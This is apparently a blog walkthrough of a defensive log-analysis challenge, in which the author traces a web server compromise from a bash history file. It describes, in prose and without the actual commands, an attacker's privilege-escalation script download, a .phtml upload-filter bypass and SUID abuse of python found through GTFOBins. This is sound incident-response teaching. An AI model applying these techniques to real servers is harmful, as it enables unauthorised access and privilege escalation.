Blue Team Labs Online — Log Analysis— Privilege Escalation Challenge Walkthrough
Analyzing Web Server Compromise with Bash History Logs and Notepad++
Introduction:
Welcome to another weekly walkthrough! If you’ve ever been curious about investigating a compromised web server, you’ve stumbled on the right blog. This week, we’re tackling the Log Analysis — Privilege Escalation challenge from Blue Team Labs Online.
This challenge is a digital forensics and incident response (DFIR) exercise that has us defenders investigating a compromised web server using only the bash history log file. To do the analysis, we’re leveraging the trusty Notepad++ to dissect the log file, uncover how the attacker compromised the server, how they escalated their privileges, and what tools they used to do it. Sounds like a fun time!
Now let’s grab some yarn and unravel the mystery behind this breach and learn a little bit more about web server security along the way. Let’s get started — thanks for reading along!
Challenge Link: https://blueteamlabs.online/home/challenge/log-analysis-privilege-escalation-65ffe8df12
Challenge Scenario:
A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?
Question 1: What user (other than ‘root’) is present on the server?
Okay, let’s kick off this investigation! We’ll start by downloading the bash history log file attached to the challenge. To begin our analysis, we’ll open the file in any plaintext editor to view the contents, for the examples in this blog, I will be using Notepad++.
Utilizing the log file, we’re going to locate the second user account on this server by looking for the presence of a home directory. In Linux, each user will have a separate /home directory except for the root account.
On line 21 we’ll see a change directory (cd) to /home/daniel. Since Daniel has a home directory, we’ve discovered the second user account!
Question 2: What script did the attacker try to download to the server?
Let’s continue scrolling through the log to look for evidence of a file download.
Eventually, we stumble across line 32 where we see some activity using wget. Wget is a command-line utility used to retrieve files and content from the web — this seems promising! Let’s take a closer look at what was retrieved:
The end of the URL path is a shell script file “linux-exploit-suggester.sh” retrieved from a GitHub repository. Let’s get some background on this tool to determine if we found the correct answer. I’ll refer to the Kali Linux documentation that states that linux-exploit-suggester is:
a Linux privilege escalation auditing tool. It’s designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine.
Based on the description, this script could be useful for an attacker’s follow-on activities and confirms that we located the correct script to answer Question 2.
Question 3: What packet analyzer tool did the attacker try to use?
Continuing to scan through the log file, we’ll come across several lines (41–47) listing network discovery commands — so we’re probably in the right spot to look for the answer to Question 3. While searching for the packet analyzer the attacker used, there are two tool commands that stick out from the rest: iptables and tcpdump.
If you haven’t encountered these utilities before, they are important to know in the context of this investigation so let’s get some quick background on both.
- iptables: iptables is a Linux firewall application that is controlled through the command line and allows configuration of network traffic rules.
2. tcpdump: Quoting the Kali Linux documentation:
This program allows you to dump the traffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other packet types.
So, based on these tool descriptions, we know that tcpdump is the packet analyzer we are looking for to answer Question 3!
Question 4: What file extension did the attacker use to bypass the file upload filter implemented by the developer?
To answer Question 4, we’re going to search for the keyword “uploads” to locate relevant log entries. Let’s focus on the last line of our log, line 63.
Unfortunately, we don’t have any deeper visibility into the setup of the PHP web server and how the developer implemented the file upload filter, so we are going to have to rely on some context clues.
Analyzing this command tells us that that the file x.phtml was deleted (rm) from the web server’s upload directory. This might indicate that the attacker is deleting indicators of their intrusion (MITRE ATT&CK T1070.004) following a malicious file upload.
Since there is evidence of file upload activity, the developer’s statement that “proper filtering is in place to prevent php file uploads to gain malicious code execution” might not be accurate. From the evidence, we might assume that the developer only filtered the .php file extension rather than also adding other standard PHP extensions like .php3 and .phtml.
Putting our evidence together, we have the developer’s statement that some file upload validation in place, but we don’t know the full scope, we know there was a file uploaded to the web server with the .phtml extension, and the file was later removed. I think we have enough evidence to say with some confidence that the .phtml file bypassed the upload filter.
Question 5: Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load
To answer the final question, we’ll focus on the Python activity that occurred before the last line we analyzed in the previous question.
We know we are looking for some exploitation of the Python binary, so let’s try to add some context about the command we see in line 62.
To do this, we need to find some reference about abusing binaries on Linux systems. Fortunately, the challenge provides a reference link to the GTFOBins repository.
So, what are GTFOBins and how can they help us solve this challenge?
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
This sounds promising! Let’s review the repository and search for Python.
Once we have read the various payloads available, we will stumble across a privilege escalation method using Python which is achieved with the same command that we discovered in our bash history log!
Since we have located the same commands in our log and have a documented method of SUID bit privilege escalation, we have enough information to answer Question 5 and wrap up this investigation!
Conclusion:
And there we have it! We’ve successfully navigated the bash history log file to discover the details of the web server compromise. With the help of Notepad++ we identified the second user account on the system, the script the attacker downloaded, the tools they used, and their method for bypassing the file upload filter. With the objectives completed, let’s close out this walkthrough of the Log Analysis — Privilege Escalation challenge!
A big thank you to Blue Team Labs Online for another fun challenge! This challenge not only highlights the importance of thorough log analysis but also demonstrates the value of understanding attacker techniques to better defend our systems. While this challenge is geared toward beginners, the hands-on practice and critical thinking required to solve it is helpful for any skill level. Personally, I was really intrigued by the exploitation of Python to achieve privilege escalation — very cool stuff!
If you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!
Until next week’s challenge — stay curious and be safe out there!
Tools & References:
Notepad++: https://notepad-plus-plus.org/
Kali Linux Documentation (linux-exploit-suggester): linux-exploit-suggester | Kali Linux Tools
Kali Linux Documentation (tcpdump): https://www.kali.org/tools/tcpdump/
MITRE ATT&CK (Indicator Removal: File Deletion): https://attack.mitre.org/techniques/T1070/004/
Wikipedia (PHP): https://simple.wikipedia.org/wiki/PHP
GTFO Bins: https://gtfobins.github.io/
